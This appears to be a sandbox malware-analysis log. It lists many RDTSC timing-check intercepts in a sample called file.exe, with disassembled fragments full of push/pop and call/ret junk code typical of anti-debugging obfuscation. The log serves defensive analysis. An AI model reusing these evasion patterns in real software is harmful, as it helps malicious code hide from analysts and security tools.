                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D487 second address: 62D498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 je 00007F6C54B58554h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631524 second address: 631598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F6C544CAC28h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 and edi, dword ptr [ebp+122D2B2Bh] 0x0000002a jmp 00007F6C544CAC38h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F6C544CAC28h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b push 00000000h 0x0000004d mov bl, 30h 0x0000004f push eax 0x00000050 push esi 0x00000051 push eax 0x00000052 push edx 0x00000053 jng 00007F6C544CAC26h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631598 second address: 63159C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6327C6 second address: 6327D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F6C544CAC26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6327D9 second address: 6327DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6337BF second address: 6337C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6327DF second address: 632862 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jns 00007F6C54B5854Ch 0x00000010 sub dword ptr [ebp+122D37F9h], edi 0x00000016 sub dword ptr [ebp+122D398Bh], edx 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov bx, 0BF7h 0x00000027 mov dword ptr [ebp+122D3B83h], edx 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 mov bx, B2E1h 0x00000038 mov eax, dword ptr [ebp+122D10CDh] 0x0000003e movzx ebx, di 0x00000041 push FFFFFFFFh 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 call 00007F6C54B58548h 0x0000004b pop eax 0x0000004c mov dword ptr [esp+04h], eax 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc eax 0x00000059 push eax 0x0000005a ret 0x0000005b pop eax 0x0000005c ret 0x0000005d jnp 00007F6C54B58549h 0x00000063 mov di, dx 0x00000066 push eax 0x00000067 jp 00007F6C54B5854Eh 0x0000006d push ebx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636283 second address: 63629B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC30h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63728C second address: 637291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637291 second address: 637317 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f jo 00007F6C544CAC28h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 nop 0x00000019 mov dword ptr [ebp+122D25DCh], esi 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D2BC7h] 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F6C544CAC28h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 add edi, dword ptr [ebp+122D2C63h] 0x00000049 push ebx 0x0000004a xor dword ptr [ebp+1247D664h], ebx 0x00000050 pop ebx 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F6C544CAC36h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637317 second address: 637321 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6C54B5854Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637321 second address: 637335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6C544CAC2Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638288 second address: 63828C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63828C second address: 63830A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6C544CAC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D25CCh], ebx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F6C544CAC28h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov ebx, esi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F6C544CAC28h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jp 00007F6C544CAC26h 0x00000058 jmp 00007F6C544CAC39h 0x0000005d popad 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638578 second address: 63857D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B370 second address: 63B391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B391 second address: 63B396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A543 second address: 63A548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6394FA second address: 6394FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A548 second address: 63A55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6C544CAC26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6395C0 second address: 6395C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B547 second address: 63B558 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C544CAC28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FB7D second address: 63FB88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F6C54B58546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D680 second address: 63D686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640CAC second address: 640CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640CB0 second address: 640D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F6C544CAC28h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D3359h], esi 0x00000028 mov ebx, dword ptr [ebp+122D29AFh] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F6C544CAC28h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov di, D545h 0x0000004e and bl, FFFFFFA4h 0x00000051 push 00000000h 0x00000053 mov ebx, ecx 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F6C544CAC39h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FE6C second address: 63FE72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FE72 second address: 63FE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FE76 second address: 63FE7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641C62 second address: 641C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641C67 second address: 641C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C54B5854Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641C78 second address: 641C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641C7C second address: 641CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov di, bx 0x0000000e je 00007F6C54B5855Ch 0x00000014 call 00007F6C54B58554h 0x00000019 clc 0x0000001a pop ebx 0x0000001b push 00000000h 0x0000001d mov ebx, dword ptr [ebp+122D29AFh] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F6C54B58548h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f push edx 0x00000040 jmp 00007F6C54B58552h 0x00000045 pop edi 0x00000046 sub bl, FFFFFFC1h 0x00000049 xchg eax, esi 0x0000004a push ecx 0x0000004b push eax 0x0000004c push edx 0x0000004d push edi 0x0000004e pop edi 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 645BDE second address: 645BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F6C544CAC26h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 645BEB second address: 645BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6C54B58546h 0x0000000a jnc 00007F6C54B58546h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647A1D second address: 647A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65282C second address: 652830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65290C second address: 652910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 652910 second address: 652916 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 652916 second address: 65292F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C544CAC35h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656180 second address: 6561A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58555h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F6C54B5854Ch 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6561A9 second address: 6561BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC31h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65671D second address: 656721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656721 second address: 656725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656725 second address: 65673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 ja 00007F6C54B5855Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F6C54B58546h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656B61 second address: 656BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC36h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6C544CAC35h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6C544CAC34h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656CE2 second address: 656D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6C54B5854Eh 0x0000000a jmp 00007F6C54B58556h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F6C54B58546h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656D14 second address: 656D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658A69 second address: 658A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658A6F second address: 658A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B523 second address: 65B527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B527 second address: 65B537 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6C544CAC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B537 second address: 65B540 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660D3C second address: 660D46 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6C544CAC2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660D46 second address: 660D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007F6C54B58546h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F6C54B5854Bh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660D6D second address: 660D82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6C544CAC2Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65F8CB second address: 65F8CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65F8CF second address: 65F8D9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6C544CAC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65F8D9 second address: 65F8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6C54B58546h 0x0000000a jl 00007F6C54B58546h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65FA5E second address: 65FA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65FA62 second address: 65FA77 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6C54B58546h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jc 00007F6C54B58546h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65FA77 second address: 65FA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65FBF8 second address: 65FC0B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F6C54B58564h 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660053 second address: 660084 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6C544CAC39h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F6C544CAC38h 0x00000010 ja 00007F6C544CAC32h 0x00000016 je 00007F6C544CAC26h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6601CA second address: 6601E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6C54B5854Ch 0x0000000a pop ebx 0x0000000b jo 00007F6C54B58568h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660341 second address: 660350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6C544CAC26h 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660350 second address: 66035C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6C54B58546h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660609 second address: 66060D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66060D second address: 660623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58552h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660623 second address: 660668 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F6C544CAC38h 0x00000008 jc 00007F6C544CAC26h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F6C544CAC4Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6C544CAC39h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CC85 second address: 60CC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660BBF second address: 660BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6662C2 second address: 6662C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6662C6 second address: 6662E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC37h 0x00000007 jl 00007F6C544CAC26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6662E7 second address: 6662ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6662ED second address: 6662F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6662F1 second address: 6662F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6662F5 second address: 666305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F6C544CAC26h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6A76 second address: 5E6A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B58550h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6A8B second address: 5E6A9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Ch 0x00000007 push esi 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665208 second address: 66522A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58551h 0x00000007 push edx 0x00000008 jmp 00007F6C54B5854Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62DDBC second address: 62DDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62DF59 second address: 62DF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62DF5D second address: 62DF63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62DF63 second address: 62DF7B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6C54B58548h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e je 00007F6C54B58546h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62DF7B second address: 62DF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E248 second address: 62E24C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
